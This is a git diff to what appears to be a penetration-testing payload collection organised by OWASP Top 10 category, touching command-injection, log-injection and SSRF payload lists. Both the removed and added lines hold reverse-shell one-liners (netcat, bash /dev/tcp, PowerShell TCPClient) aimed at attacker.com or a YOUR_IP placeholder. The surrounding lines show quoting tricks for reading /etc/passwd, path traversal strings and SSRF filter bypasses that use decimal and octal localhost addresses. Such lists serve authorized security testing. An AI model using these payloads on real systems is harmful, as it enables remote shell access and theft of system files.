diff --git a/OWASP-Top-10/A03-Injection/command-injection-payloads.txt b/OWASP-Top-10/A03-Injection/command-injection-payloads.txt
index bfd5c9a..f7e58d1 100644
--- a/OWASP-Top-10/A03-Injection/command-injection-payloads.txt
+++ b/OWASP-Top-10/A03-Injection/command-injection-payloads.txt
@@ -74,7 +74,7 @@ c'a't /etc/passwd
 c"a"t /etc/passwd
 c\at /etc/passwd
-# Reverse shell payloads (for testing only)
-; nc -e /bin/sh attacker.com 4444
-| bash -i >& /dev/tcp/attacker.com/4444 0>&1
-& powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('attacker.com',4444);"
+# Reverse shell payloads (for authorized testing only - replace YOUR_IP and PORT)
+; nc -e /bin/sh YOUR_IP PORT
+| bash -i >& /dev/tcp/YOUR_IP/PORT 0>&1
+& powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('YOUR_IP',PORT);"
diff --git a/OWASP-Top-10/A09-Security-Logging-Monitoring-Failures/log-injection-payloads.txt b/OWASP-Top-10/A09-Security-Logging-Monitoring-Failures/log-injection-payloads.txt
index 9330d52..641d5ee 100644
--- a/OWASP-Top-10/A09-Security-Logging-Monitoring-Failures/log-injection-payloads.txt
+++ b/OWASP-Top-10/A09-Security-Logging-Monitoring-Failures/log-injection-payloads.txt
@@ -32,18 +32,19 @@ user\x00admin
 /var/log/auth.log
 ../../../var/log/syslog
-# Events that should be logged (test if they're logged)
-- Failed login attempts
-- Successful login
-- Password changes
-- Privilege escalation
-- Administrative actions
-- Access to sensitive data
-- Invalid input
-- Authentication failures
-- Authorization failures
+# Events to test if they appear in logs
+# Try these payloads and verify they are logged appropriately:
+# - Failed login attempts
+# - Successful login
+# - Password changes
+# - Privilege escalation attempts
+# - Administrative actions
+# - Access to sensitive data
+# - Invalid input
+# - Authentication failures
+# - Authorization failures
-# Events to check in logs
+# Sample payloads to check logging behavior
 SELECT * FROM users WHERE username='admin' AND password='wrong'
 ../../../etc/passwd
diff --git a/OWASP-Top-10/A10-Server-Side-Request-Forgery/ssrf-payloads.txt b/OWASP-Top-10/A10-Server-Side-Request-Forgery/ssrf-payloads.txt
index e36d51e..d9b06a2 100644
--- a/OWASP-Top-10/A10-Server-Side-Request-Forgery/ssrf-payloads.txt
+++ b/OWASP-Top-10/A10-Server-Side-Request-Forgery/ssrf-payloads.txt
@@ -51,9 +51,10 @@ ldap://127.0.0.1:389
 tftp://127.0.0.1:69
 # Bypassing filters
-# Using decimal IP
-http://2130706433 (127.0.0.1)
-http://3232235521 (192.168.0.1)
+# Using decimal IP (127.0.0.1 in decimal)
+http://2130706433
+# Using decimal IP (192.168.0.1 in decimal)
+http://3232235521
 # Using octal IP
 http://0177.0.0.1